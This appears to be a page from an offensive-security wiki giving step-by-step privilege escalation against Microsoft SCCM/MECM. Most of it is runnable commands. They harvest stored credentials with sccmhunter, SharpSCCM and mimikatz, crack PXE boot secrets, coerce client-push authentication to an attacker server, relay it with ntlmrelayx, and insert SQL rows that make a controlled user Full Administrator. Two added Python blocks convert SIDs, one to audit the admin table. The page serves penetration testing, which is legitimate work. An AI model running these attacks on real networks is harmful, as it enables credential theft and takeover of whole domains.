Infiltr8: The Red-Book
Privilege Escalation


Theory

Currently there are three different privilege escalation pathways in an SCCM environment that lead to taking control over the infrastructure:

  • Credential harvesting: includes all the ways that could permit to retrieve SCCM related credentials in the environment.

  • Authentication Coercion: with a compromised machine in an Active Directory domain where SCCM is deployed on the assets via Client Push Accounts, it is possible to have the "Client Push Account" authenticate to a remote resource and, for instance, retrieve an NTLM response (i.e. ). The "Client Push Account" usually has local administrator rights on a lot of assets.

  • SCCM site takeover: an NTLM authentication obtained from the SCCM primary site server can be relayed to the SMS Provider or to the MSSQL server in order to compromise the SCCM infrastructure.

  • SCCM site takeover from a passive site server: as described by in this , when a passive site server is set up for high availability purposes, its machine account must be a member of the local Administrators group on the active site server. It must also be an administrator on all the site systems deployed in the site, including the MSSQL database.

Credential harvesting

The following SCCM components can be found on SCCM clients and may contain credentials:

  • Device Collection variables

  • TaskSequence variables

  • Network Access Accounts (NAAs)

  • Client Push Accounts

  • Application & Scripts (potentially)

Find more details about these components in post.

Network Access Accounts (NAAs)

NAAs are manually created domain accounts used to retrieve data from the SCCM Distribution Point (DP) when the machine cannot use its machine account, typically because it has not yet been registered in the domain. To do this, the SCCM server sends the NAA policy to the machine, which stores the credentials on disk, encrypted with DPAPI. The credentials can be retrieved by requesting the WMI class, or from the CIM store, a binary file on the disk.

NAAs don't need to be privileged on the domain, but it can happen that administrators give too many privileges to these accounts.

It is worth noting that, even after the NAA is deleted or changed in the SCCM configuration, the binary file on the enrolled computers still contains the encrypted credentials.

SystemDPAPIdump

SystemDPAPIdump.py -creds -sccm $DOMAIN/$USER:$PASSWORD@target.$DOMAIN

Manually

On the other hand, it is possible, from a controlled computer account, to manually request the SCCM policy and retrieve the NAAs inside.

Step 1: Gain control over a computer account password.

For this step, it is possible to create a new computer account (if permitted by the domain policy) instead of compromising a domain computer.

addcomputer.py -dc-ip $DC -computer-name controlledComputer$ -computer-pass controlledPassword $DOMAIN/$USER:$PASSWORD

Step 2: Use sccmwtf.py to extract NAA secrets

A controlled computer account is needed to send the authenticated request (this is why a computer account was created in the previous step) to retrieve the policy, but the account to spoof doesn't need to be the same one.

Here, $SCCM_MP_NetBiosName takes the value of the SCCM Management Point server NETBIOS name.

sccmwtf.py fakepc fakepc.$DOMAIN $SCCM_MP_NetBiosName "$DOMAIN\controlledComputer$" "controlledPassword"

Step 3: Obtain obfuscated NAA secrets

The obfuscated NAA secrets will be saved in a local file.

cat /tmp/naapolicy.xml

Values to decode are the long hexadecimal strings in the CDATA sections (<![CDATA[String_here]]>).

Step 4: Decode obfuscated strings

policysecretdecrypt.exe $HEX_STRING

SCCMHunter

HTTP

# Create a new computer account and request the policies
python3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -auto

# To use an already controlled computer account
python3 sccmhunter.py http -u $USER -p $PASSWORD -d $DOMAIN -cn $COMPUTER_NAME -cp $COMPUTER_PASSWORD -dc-ip $DC_IP

DPAPI

# Extracting from WMI repository root\ccm\policy\Machine\ActualConfig namespace:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -wmi

# Extracting from WMI repository OBJECTS.DATA file:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -disk
# Locally From WMI
Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig -Class CCM_NetworkAccessAccount

# Extracting from CIM store
SharpSCCM.exe local secrets -m disk

# Extracting from WMI
SharpSCCM.exe local secrets -m wmi

# Using SharpDPAPI
SharpDPAPI.exe SCCM

# Using mimikatz
mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # dpapi::sccm

SharpSCCM can also request the SCCM policy remotely to retrieve the NAA credentials it contains.

SharpSCCM.exe get secrets

TaskSequence variables

TaskSequences are steps that an administrator can configure to perform specific actions, for example "Sequence for adding a machine to the domain". Think of them as scripts that run. These TaskSequences can contain variables, which in turn can contain credentials. These sequences can use device collection variables (presented in the next section) as conditions.

# Extracting from WMI repository root\ccm\policy\Machine\ActualConfig namespace:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -wmi

# Extracting from WMI repository OBJECTS.DATA file:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -disk
# Locally from WMI 
Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig -Class CCM_TaskSequence

# Extracting from CIM store
SharpSCCM.exe local secrets -m disk

# Extracting from WMI
SharpSCCM.exe local secrets -m wmi

SharpSCCM can also request the SCCM policy remotely to retrieve the NAA credentials it contains.

SharpSCCM.exe get secrets

Device Collection variables

Devices enrolled in an SCCM environment can be grouped by collection. Some collections exist by default, but administrators can create custom collections (for example "Server 2012 devices") and add variables to these collections that will be used, for example, during application deployment to check some conditions. These variables may very well contain credentials and be found locally on the clients.

# Extracting from WMI repository root\ccm\policy\Machine\ActualConfig namespace:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -wmi

# Extracting from WMI repository OBJECTS.DATA file:
python3 sccmhunter.py dpapi -u $USER -p $PASSWORD -d $DOMAIN -dc-ip $DC_IP -target $TARGET_IP -disk
# Locally from WMI 
Get-WmiObject -Namespace ROOT\ccm\policy\Machine\ActualConfig -Class CCM_CollectionVariable

# Locally from CIM store
SharpSCCM.exe local secrets -m disk

# Locally from WMI
SharpSCCM.exe local secrets -m wmi

PXE/OSD (Operating System Deployment)

Credential harvesting

The Pre-Boot Execution Environment (PXE) is a mechanism for booting a computer over the network. Specifically, instead of booting from a CD drive, USB key or hard disk and finding the boot program there, the PC uses the network to read such a program from the PXE server.

Several secrets can be retrieved from Operating System Deployment (OSD):

  • Collection variables

  • Account to write image to SMB share

  • Account to pull files from SMB share

  • Set local admin password

  • Run arbitrary command

  • Account to join the domain (Apply Network Settings)

No Password

sudo python3 pxethiefy.py explore -i eth0

Password Protected

sudo python3 pxethiefy.py explore -i eth0
# Setting up Hashcat
cd /workspace
git clone https://github.com/hashcat/hashcat.git
git clone https://github.com/MWR-CyberSec/configmgr-cryptderivekey-hashcat-module
cp configmgr-cryptderivekey-hashcat-module/module_code/module_19850.c hashcat/src/modules/
cp configmgr-cryptderivekey-hashcat-module/opencl_code/m19850* hashcat/OpenCL/
cd hashcat
git checkout -b v6.2.5 tags/v6.2.5
make

# Crack the hash
hashcat/hashcat -m 19850 --force -a 0 /workspace/pxe_hash /usr/share/wordlists/rockyou.txt

Decrypt the file using the found password

pxethiefy.py decrypt -p "password" -f ./2023.05.05.10.43.44.0001.{85CA0850-35DC-4A1F-A0B8-8A546B317DD1}.boot.var

No Password

python.exe pxethief.py 2 $SCCM_IP

Password Protected

python.exe pxethief.py 2 $SCCM_IP

Download the encrypted files specified by PXEThief, and print the hash

# Retrieve files
tftp -i 192.168.33.11 GET "\SMSTemp\2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var" "2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var"

# Get the hash
python.exe pxethief.py 5 '.\2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var'

Decrypt the file using the found password

py.exe pxethief.py 3 ".\2024.03.28.03.27.34.0001.{BC3AEB9D-2A6C-46FB-A13E-A5EEF11ABACD}.boot.var" password

Misconfiguration

If "Enable command support" is enabled, we can spawn a shell during OS deployment by pressing F8.

Authentication Coercion via Client Push Installation

In some cases, the "Client Push Accounts" could even be part of the Domain Admins group, leading to a complete takeover of the domain.

The client push installation can be triggered forcefully or, if you're lucky, your compromised machine might not have the SCCM client installed yet, which means you could capture the client push installation as it occurs.

Option 1: Forcefully "coerce" the Client Push Installation

Step 1: Prepare coercion receiver

Note that you could either capture & crack received credentials or relay them to a suitable target system (or both).

# On Linux
## Relay using ntlmrelayx.py
ntlmrelayx.py -smb2support -socks -ts -ip 10.250.2.100 -t 10.250.2.179
# On Windows
## Credential capture using Inveigh 
Inveigh.exe

Step 2: Trigger Client-Push Installation

# If admin access over Management Point (MP)
SharpSCCM.exe invoke client-push -t <AttackerServer> --as-admin

# If not MP admin
SharpSCCM.exe invoke client-push -t <AttackerServer>

Step 3: Cleanup

If you ran the above SharpSCCM command with the --as-admin parameter (because you have admin privileges over the MP), there's nothing to do. Otherwise, get in contact with the administrator of the SCCM system you just messed up and provide the name or IP of the attacker server you passed in the -t <AttackerServer> parameter. This is the device name that will appear in SCCM.

Option 2: Wait for Client Push Installation

# Credential capture using Inveigh 
Inveigh.exe

SCCM Site Takeover

The user account that installs the site must have the following permissions:

  • Administrator on the following servers:

    • The site server

    • Each SQL Server that hosts the site database

    • Each instance of the SMS Provider for the site

  • Sysadmin on the instance of SQL Server that hosts the site database

This means that it is possible to obtain administrative access on the site database server, or to interact as a local administrator with the HTTP API on the SMS Provider, by relaying an NTLM authentication coming from the primary site server (for example by coercing an automatic client push installation from it), and then granting full access on the SCCM site to a controlled user.

Relay to the MSSQL site database

Some requirements are needed to perform the attack:

  • fallback to NTLM authentication is enabled (default)

  • PKI certificates are not required for client authentication (default)

  • either:

    • MSSQL is reachable on the site database server

    OR

    • SMB is reachable and SMB signing isn’t required on the site database server

  • knowing the three-character site code for the SCCM site is required (step 3 below)

  • knowing the NetBIOS name, FQDN, or IP address of a site management point is required

  • knowing the NetBIOS name, FQDN, or IP address of the site database server is required

  1. Retrieve the controlled user SID

The first step consists in retrieving the hexadecimal format of the SID (Security IDentifier) of the user to whom the "Full Administrator" SCCM role will be granted on the site database server. The hex-formatted SID is needed in the SQL console step below: https://github.com/v4resk/red-book/blob/main/ad/movement/sccm-mecm/sccm-mecm.md#4.-obtain-an-sql-console.

# Option A: resolve the user's SID with rpcclient
rpcclient -c "lookupnames USER" $TARGET_IP

# Option B: resolve the user's SID with impacket's lookupsid.py
lookupsid.py "$DOMAIN"/"$USERNAME":"$PASSWORD"@"$TARGET_IP_OR_NAME"

# Convert the canonical SID to the hex format expected by the RBAC_Admins table (Python, impacket)
from impacket.ldap import ldaptypes
sid = ldaptypes.LDAP_SID()
sid.fromCanonical('sid_value')
print('0x' + ''.join('{:02X}'.format(b) for b in sid.getData()))

# Option C: this should be run on the Windows SCCM client as the user (no need for admin privileges here)
SharpSCCM.exe get user-sid

  2. Setup NTLM relay server

# targeting MS-SQL
ntlmrelayx.py -t "mssql://siteDatabase.domain.local" -smb2support -socks

# targeting SMB
ntlmrelayx.py -t "siteDatabase.domain.local" -smb2support -socks

  3. Authentication coercion

There isn't any UNIX-like alternative to the SharpSCCM.exe invoke client-push feature (yet).

SharpSCCM.exe invoke client-push -mp "SCCM-Server" -sc "<site_code>" -t "attacker.domain.local"

The rest of this page focuses on relaying the authentication to the MS-SQL service.

  4. Obtain an SQL console

proxychains mssqlclient.py "DOMAIN/SCCM-Server$"@"siteDatabase.domain.local" -windows-auth

Once the console is obtained, the attack can proceed to granting the user full privileges by running the following commands in the SQL console.

--Switch to site database
use CM_<site_code>

--Add the SID, the name of the current user, and the site code to the RBAC_Admins table
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (<SID_in_hex_format>,'DOMAIN\user',0,0,'','','','','<site_code>');

--Retrieve the AdminID of the added user
SELECT AdminID,LogonName FROM RBAC_Admins;

--Add records to the RBAC_ExtendedPermissions table granting the AdminID the Full Administrator (SMS0001R) RoleID for the “All Objects” scope (SMS00ALL), 
--the “All Systems” scope (SMS00001), 
--and the “All Users and User Groups” scope (SMS00004)
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (<AdminID>,'SMS0001R','SMS00ALL','29');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (<AdminID>,'SMS0001R','SMS00001','1');
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES (<AdminID>,'SMS0001R','SMS00004','1');

It is then possible to verify the new privileges on SCCM.

# this should be run on the windows SCCM client as the user that was just given full administrative role to 
.\SharpSCCM.exe get site-push-settings -mp "SCCM-Server" -sc "<site_code>"

Post exploitation via SCCM can now be performed on the network.
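As an added example (not the Red-Book's code and independent of impacket), the following Python implements the SID conversion used in step 1 with the standard library only, and reuses the decoder to read AdminSID blobs out of RBAC_Admins-style rows so a defender can compare the table against the SIDs that are supposed to hold SCCM roles. The lab domain SID, logon names and rows are constructed.

```python
"""Windows SID <-> binary hex conversion, as used for the RBAC_Admins.AdminSID column.

Added example (not Red-Book or impacket code). Layout per the MS-DTYP SID structure:
  revision (1 byte) | sub-authority count (1 byte) |
  identifier authority (6 bytes, big-endian) | N x sub-authority (uint32, little-endian)
"""
import re
import struct

SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")
MAX_SUB_AUTHORITIES = 15  # SID_MAX_SUB_AUTHORITIES in the Windows SDK


def sid_to_hex(sid):
    """Encode a canonical SID ("S-1-5-21-...") as a 0x-prefixed uppercase hex blob."""
    match = SID_RE.match(sid.strip().upper())
    if not match:
        raise ValueError("not a canonical SID with at least one sub-authority: %r" % sid)
    revision, authority = int(match.group(1)), int(match.group(2))
    subs = [int(x) for x in match.group(3).split("-") if x]
    if revision != 1:
        raise ValueError("unsupported SID revision %d" % revision)
    if len(subs) > MAX_SUB_AUTHORITIES:
        raise ValueError("more than %d sub-authorities" % MAX_SUB_AUTHORITIES)
    if authority >= 1 << 48 or any(s >= 1 << 32 for s in subs):
        raise ValueError("authority or sub-authority out of range")
    data = struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
    data += b"".join(struct.pack("<I", s) for s in subs)
    return "0x" + data.hex().upper()


def hex_to_sid(blob):
    """Decode a 0x-prefixed (or bare) hex SID blob back to canonical form."""
    raw = bytes.fromhex(blob[2:] if blob[:2].lower() == "0x" else blob)
    if len(raw) < 8:
        raise ValueError("SID blob shorter than the 8-byte header")
    revision, count = struct.unpack_from("<BB", raw, 0)
    expected = 8 + 4 * count
    if revision != 1 or not 1 <= count <= MAX_SUB_AUTHORITIES or len(raw) != expected:
        raise ValueError("malformed SID blob (revision %d, %d sub-authorities, %d bytes)"
                         % (revision, count, len(raw)))
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, raw, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def is_valid_sid(sid):
    """True if the string encodes cleanly; rejects bad input before it reaches any SQL."""
    try:
        sid_to_hex(sid)
        return True
    except ValueError:
        return False


def find_unexpected_admins(rows, allowed_sids):
    """Decode (LogonName, AdminSID) rows and return those whose SID is not allow-listed.

    The rows mirror the RBAC_Admins columns named on this page; decoding the blob is what
    lets a defender reconcile the table with the SIDs that legitimately hold SCCM roles.
    """
    unexpected = []
    for logon_name, admin_sid in rows:
        canonical = hex_to_sid(admin_sid)
        if canonical not in allowed_sids:
            unexpected.append((logon_name, canonical))
    return unexpected


# Constructed sample data: a fictional lab domain SID and two RBAC_Admins-style rows.
LAB_DOMAIN_SID = "S-1-5-21-1004336348-1177238915-682003330"
CONSTRUCTED_ROWS = [
    ("LAB\\sccm-admin", sid_to_hex(LAB_DOMAIN_SID + "-1105")),  # expected administrator
    ("LAB\\helpdesk", sid_to_hex(LAB_DOMAIN_SID + "-1337")),    # not in the allow-list
]
ALLOWED_SIDS = {LAB_DOMAIN_SID + "-1105"}

if __name__ == "__main__":
    print(sid_to_hex("S-1-5-32-544"))  # BUILTIN\Administrators
    for logon_name, sid in find_unexpected_admins(CONSTRUCTED_ROWS, ALLOWED_SIDS):
        print("unexpected SCCM admin: %s (%s)" % (logon_name, sid))
```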

Relay to the HTTP API AdminService

Some requirements are needed to perform the attack:

  • The HTTP API for the AdminService service is reachable on the SMS Provider server

  • knowing the NetBIOS name, FQDN, or IP address of a site management point is required

  • knowing the NetBIOS name, FQDN, or IP address of the site SMS provider server is required

  1. Setup an NTLM relay server

ntlmrelayx.py -t https://smsprovider.domain.local/AdminService/wmi/SMS_Admin -smb2support --adminservice --logonname "DOMAIN\USER" --displayname "DOMAIN\USER" --objectsid <USER_SID>

  2. Authentication coercion

There isn't any UNIX-like alternative to the SharpSCCM.exe invoke client-push feature (yet).

SharpSCCM.exe invoke client-push -mp "SCCM-Server" -sc "<site_code>" -t "attacker.domain.local"

If the NTLM relay attack succeeds and ntlmrelayx.py has effectively sent the request to the SMS Provider server, the controlled user should now be an SCCM site admin.

It is then possible to verify the new privileges on SCCM.

# this should be run on the windows SCCM client as the user that was just given full administrative role to 
SharpSCCM.exe get site-push-settings -mp "SCCM-Server" -sc "<site_code>"

Relay from a passive site server to the active site server

Some requirements are needed to perform the attack:

  • a passive site server is present on the network and it is reachable

  • knowing the NetBIOS name, FQDN, or IP address of the passive and active site servers is required

  • SMB signing is not required on the active site server (default)

  1. Setup an NTLM relay server

ntlmrelayx.py -t $ACTIVE_SERVER.$DOMAIN -smb2support -socks

  2. Authentication coercion

If the NTLM relay attack succeeds and ntlmrelayx.py has effectively relayed the authentication to the active server, an SMB session with administrative rights has been opened through the SOCKS proxy.

  3. Dump active site server account credentials

proxychains4 secretsdump.py $DOMAIN/$PASSIVE_SERVER\$@$ACTIVE_SERVER.$DOMAIN

Retrieve the LM:NT hash of the server account.

  4. Add a new SCCM Full Admin

sccmhunter.py admin -u $ACTIVE_SERVER\$ -p $LMHASH:NTHASH -ip $SMS_PROVIDER_IP

() (C:\) >> add_admin controlledUser <controlledUser_SID>
() (C:\) >> show_admins

Post exploitation via SCCM can now be performed on the network.

Resources

From UNIX-like systems, with administrative privileges over a device enrolled in the SCCM environment, SystemDPAPIdump.py (Python) can be used to decrypt the SCCM-related WMI blob via DPAPI and retrieve the stored credentials. The tool can also extract SYSTEM DPAPI credentials.

The tool author (Adam Chester) warns not to use this script in production environments.

To decode the username and password, use .\DeobfuscateSecretString.exe, contained in SharpSCCM or sccmwtf.

Alternatively, sccmhunter (Python) automates the whole attack, with or without an already controlled computer account. For this purpose, the http module uses the results of the find command and enumerates the remote hosts for SCCM/MECM enrollment web services. If it finds one, it performs Adam Chester's attack for the specified computer account. If no account is already under control, the -auto flag can be set to create a new computer account.

sccmhunter's DPAPI module (Python) can also be used, with valid credentials for a local administrator on the target system, to remotely extract the NAA credentials located in the local WMI repository.

From a Windows machine enrolled in the SCCM environment, SharpSCCM (C#), SharpDPAPI, Mimikatz (C) or a PowerShell command can be used, with administrative rights, to extract the NAA credentials locally.

From UNIX-like systems, with administrative privileges over a device enrolled in the SCCM environment, sccmhunter (Python) can be used to extract the TaskSequence variables remotely.

From a Windows machine enrolled in the SCCM environment, SharpSCCM (C#) or a PowerShell command can be used, with administrative rights, to extract the TaskSequence variables locally.

From UNIX-like systems, with administrative privileges over a device enrolled in the SCCM environment, sccmhunter (Python) can be used to extract the TaskSequence variables remotely.

From a Windows machine enrolled in the SCCM environment, SharpSCCM (C#) or a PowerShell command can be used, with administrative rights, to extract the collection variables locally.

Without PXE password protection, we can use pxethiefy.py (Python) as follows to extract secrets from the Operating System Deployment.

If a PXE password is set, we can use pxethiefy.py (Python) as follows. It will automatically download the encrypted files and extract the hash.

We can then try to crack it using Christopher Panayi's hashcat module.

Without PXE password protection, we can use PXEThief as follows to extract secrets from the Operating System Deployment.

If a PXE password is set, we can start with PXEThief.

We can then try to crack it using Christopher Panayi's hashcat module (check the UNIX-like tab for more details).

Important note: you want to read this blog post before you continue down this route, as this attack might leave traces behind and might junk up the SCCM environment.

The primary site server's computer account is a member of the local Administrators group on the site database server and on every site server hosting the "SMS Provider" role in the hierarchy (see SCCM Topology).

(source: Microsoft.com)

For more details about how these attacks work, refer to the article "SCCM Site Takeover via Automatic Client Push Installation" by Chris Thompson for the database attack, and "Site Takeover via SCCM's AdminService API" by Garrett Foster for the HTTP one.

  • automatic site assignment and automatic site-wide client push installation are enabled

  • the hotfix KB15599094 is not installed (it prevents the client push installation account from performing an NTLM connection to a client)

The first four requirements above apply to the client push installation coercion technique. Without them, a regular coercion technique could still be used (PetitPotam, PrinterBug, etc.).

From UNIX-like systems, the Samba utility named rpcclient can be used for this purpose.

Impacket's lookupsid (Python) can also be used to retrieve the user's SID.

The returned SID value is in canonical format and not hexadecimal; impacket can be used to convert it as follows.
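The canonical-to-hexadecimal SID conversion referred to above, as an added example that is neither the page's own snippet nor impacket's code: it implements the binary SID layout from [MS-DTYP] 2.4.2.2 in both directions, so the same functions also decode SIDs found in binary structures (ACLs, event data) during analysis. The sample SIDs used here are constructed.

```python
"""Convert a Windows SID between its canonical string form (S-1-5-21-...)
and the binary layout of [MS-DTYP] 2.4.2.2, in both directions.
Added example, not the page's own tooling; sample SIDs are constructed."""
import struct


def sid_to_bytes(sid: str) -> bytes:
    """Encode a canonical SID string into its binary representation."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0].upper() != "S":
        raise ValueError(f"not a canonical SID: {sid!r}")
    revision = int(parts[1])
    authority = int(parts[2])
    sub_auths = [int(p) for p in parts[3:]]
    if not 0 <= revision <= 255 or len(sub_auths) > 15:
        raise ValueError("revision or sub-authority count out of range")
    if not 0 <= authority < 2**48:
        raise ValueError("identifier authority does not fit in 48 bits")
    # Revision (1 byte), SubAuthorityCount (1 byte),
    # IdentifierAuthority (6 bytes, big-endian)
    out = bytes([revision, len(sub_auths)]) + authority.to_bytes(6, "big")
    # Each SubAuthority is a 32-bit little-endian unsigned integer
    out += b"".join(struct.pack("<I", s) for s in sub_auths)
    return out


def sid_to_hex(sid: str) -> str:
    """Hexadecimal form of the binary SID, e.g. for tools that expect it."""
    return sid_to_bytes(sid).hex().upper()


def bytes_to_sid(data: bytes) -> str:
    """Decode a binary SID back into its canonical string form."""
    if len(data) < 8:
        raise ValueError("SID too short")
    revision, count = data[0], data[1]
    if len(data) != 8 + 4 * count:
        raise ValueError("sub-authority count does not match data length")
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack(f"<{count}I", data[8:])
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])


def hex_to_sid(hexstr: str) -> str:
    """Decode a hexadecimal SID string into its canonical form."""
    return bytes_to_sid(bytes.fromhex(hexstr))


if __name__ == "__main__":
    # BUILTIN\Administrators, a well-known SID used as a constructed sample
    print(sid_to_hex("S-1-5-32-544"))  # 01020000000000052000000020020000
```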

From Windows systems, SharpSCCM (C#) can be used for this purpose.

The target of the NTLM relay attack must be set to the site database server, either on the MS-SQL service (port 1433/tcp) or on the SMB service (port 445/tcp) if the relayed user has admin privileges on the target. The rest of this page focuses on relaying the authentication to the MS-SQL service.

From UNIX-like systems, Impacket's ntlmrelayx.py (Python) script can be used for that purpose. In the examples below, the -socks option is used for more versatility but is not required.

From Windows systems, Inveigh-Relay (PowerShell) can be used as an alternative to Impacket's ntlmrelayx.py; however, it doesn't feature the same SOCKS functionality, which is needed in the steps detailed below, so the exploitation from a Windows system will need to be adapted.

For more insight on NTLM relay attacks and tool options, see the corresponding page on The Hacker Recipes: NTLM Relay.

The primary site server's authentication can be coerced via automatic client push installation targeting the relay server with SharpSCCM (C#). For more information, see the corresponding article "Coercing NTLM authentication from SCCM" by Chris Thompson. Alternatively, the server's authentication could be coerced with other, more common, coercion techniques (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.).

From UNIX-like systems, authentication can be coerced through PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc. (not based on triggering the client push installation).

If the NTLM relay attack succeeds and was targeting the MS-SQL service with SOCKS support, an SQL console can be obtained on the SCCM database through the opened SOCKS proxy. From UNIX-like systems, Impacket's mssqlclient (Python) can be used for that purpose.

The target of the NTLM relay attack must be set to the SMS Provider server, on the HTTP/S service (port 80/tcp or 443/tcp).

From UNIX-like systems, the version of Impacket's ntlmrelayx.py (Python) script from this PR can be used for that purpose.

From Windows systems, Inveigh-Relay (PowerShell) can be used as an alternative to Impacket's ntlmrelayx.py; however, it doesn't feature the same functionalities regarding this specific target, which are needed in the steps detailed below, so the exploitation from a Windows system will need to be adapted.

For more insight on NTLM relay attacks and tool options, see the corresponding page on The Hacker Recipes: NTLM Relay.

The primary site server's authentication can be coerced via automatic client push installation targeting the relay server with SharpSCCM (C#). For more information, see the corresponding article "Coercing NTLM authentication from SCCM" by Chris Thompson. Alternatively, the server's authentication could be coerced with other, more common, coercion techniques (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.).

From UNIX-like systems, authentication can be coerced through PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc. (not based on triggering the client push installation).

The target of the NTLM relay attack must be set to the active site server, on the SMB service.

From UNIX-like systems, Impacket's ntlmrelayx.py (Python) script can be used for that purpose.

From Windows systems, Inveigh-Relay (PowerShell) can be used as an alternative to Impacket's ntlmrelayx.py; however, it doesn't feature the same functionalities regarding this specific target, which are needed in the steps detailed below, so the exploitation from a Windows system will need to be adapted.

For more insight on NTLM relay attacks and tool options, see the corresponding page on The Hacker Recipes: NTLM Relay.

The passive site server's authentication can be coerced with the usual coercion techniques (PrinterBug, PetitPotam, ShadowCoerce, DFSCoerce, etc.).

Through the SOCKS session, it is possible to dump the local credentials stored in the SAM database, and the secrets from the LSA, with Impacket's secretsdump.py (Python).

Since the active site server must be a member of the SMS Provider administrators (it is a member of the SMS Admins group), its credentials can be used to add a new controlled user to the SCCM Full Admin group. sccmhunter (Python) can be used for this purpose.

The tool author (Chris Thompson) warns that SharpSCCM is a PoC only tested in a lab. One should be careful when running it in production environments.

  • Active Directory Spotlight: Attacking The Microsoft Configuration Manager (SCCM/MECM) (sse_gmbh)
  • Push Comes To Shove: exploring the attack surface of SCCM Client Push Accounts (Trimarc Content Hub)
  • The Phantom Credentials of SCCM: Why the NAA Won't Die (Medium)
  • @_xpn_ - Exploring SCCM by Unobfuscating Network Access Accounts (XPN InfoSec Blog)
  • SCCM Site Takeover via Automatic Client Push Installation (Medium)
  • Coercing NTLM Authentication from SCCM (Medium)
  • Site Takeover via SCCM's AdminService API (Posts By SpecterOps Team Members)
  • SCCM Hierarchy Takeover with High Availability (Posts By SpecterOps Team Members)